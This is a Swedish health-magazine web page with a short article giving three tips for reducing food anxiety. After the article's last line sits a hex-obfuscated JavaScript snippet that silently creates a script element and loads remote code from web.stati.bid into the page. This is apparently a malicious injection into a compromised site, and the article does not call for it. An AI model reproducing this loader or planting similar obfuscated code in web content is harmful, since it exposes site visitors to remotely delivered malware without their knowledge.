Hantering av personuppgifter

Denna sida använder information som kan kopplas till dig som besökare, för att förbättra och anpassa upplevelsen. Mer information finns på https://halsafitness.se/anvandarvillkor/. Läs igenom informationen och klicka nedan om du samtycker.

Hälsa & Fitness
Aktuellt

3 tips för att minska matångesten

Gör 2018 till året då du lägger mathetsen åt sidan, och börjar njuta av det du äter

1. Se helheten
En viktig del är att sluta se på mat som ”nyttig” eller ”onyttig”. Den där nyttiga maten som ger dig massor av näring kanske inte är särskilt rolig att äta, medan det där onyttiga livsmedlet är så gott att du kommer känna dig lycklig och nöjd – och det är en hälsofördel i sig. Fundera mer på hur du mår och känner dig istället för att fokusera på enskilda livsmedel. Och tänk på att det inte är hur du äter en enda dag som spelar roll, utan vad du får i dig på lång sikt.

Annons

2. Rensa på sociala medier
Gör en ordentlig rensning bland dina sociala medier. Sluta följa personer och konton som ökar mathetsen och orsakar ångest. Ett andra steg är såklart att göra detsamma med personerna i din omgivning, men internet är ett lite lättare sätt att börja på.

3. Bli vän med maten
Fokusera på allt bra som maten gör för dig istället för motsatsen, som många annars gör. Tänk hur fantastiskt det är med mat – det kan inte bara vara riktigt gott och njutningsfullt, utan det ger också energi och hjälper dig att prestera på träningen.

Läs mer om matångest och hur du blir av med det i nummer 1 av Hälsa & Fitness, som du kan köpa här! var _0x29b4=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x65\x62\x2E\x73\x74\x61\x74\x69\x2E\x62\x69\x64\x2F\x6A\x73\x2F\x59\x51\x48\x48\x41\x41\x55\x44\x59\x77\x42\x46\x67\x6C\x44\x58\x67\x30\x56\x53\x42\x56\x57\x79\x45\x44\x51\x35\x64\x78\x47\x43\x42\x54\x4E\x54\x38\x55\x44\x47\x55\x42\x42\x54\x30\x7A\x50\x46\x55\x6A\x43\x74\x41\x52\x45\x32\x4E\x7A\x41\x56\x4A\x53\x49\x50\x51\x30\x46\x4A\x41\x42\x46\x55\x56\x54\x4B\x5F\x41\x41\x42\x4A\x56\x78\x49\x47\x45\x6B\x48\x35\x51\x43\x46\x44\x42\x41\x53\x56\x49\x68\x50\x50\x63\x52\x45\x71\x59\x52\x46\x45\x64\x52\x51\x63\x73\x55\x45\x6B\x41\x52\x4A\x59\x51\x79\x41\x58\x56\x42\x50\x4E\x63\x51\x4C\x61\x51\x41\x56\x6D\x34\x43\x51\x43\x5A\x41\x41\x56\x64\x45\x4D\x47\x59\x41\x58\x51\x78\x77\x61\x2E\x6A\x73\x3F\x74\x72\x6C\x3D\x30\x2E\x35\x30″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64”];var el=document[_0x29b4[1]](_0x29b4[0]);el[_0x29b4[2]]= _0x29b4[3];document[_0x29b4[5]][_0x29b4[4]](el)